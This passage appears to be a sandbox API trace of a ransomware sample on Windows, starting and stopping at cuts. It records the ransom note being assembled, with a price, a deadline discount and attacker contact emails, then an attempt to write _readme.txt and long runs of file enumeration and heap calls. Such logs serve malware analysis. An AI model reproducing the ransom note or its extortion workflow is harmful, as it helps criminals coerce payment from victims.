hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.444] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.444] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.444] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.444] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.444] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.444] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.445] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.445] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: 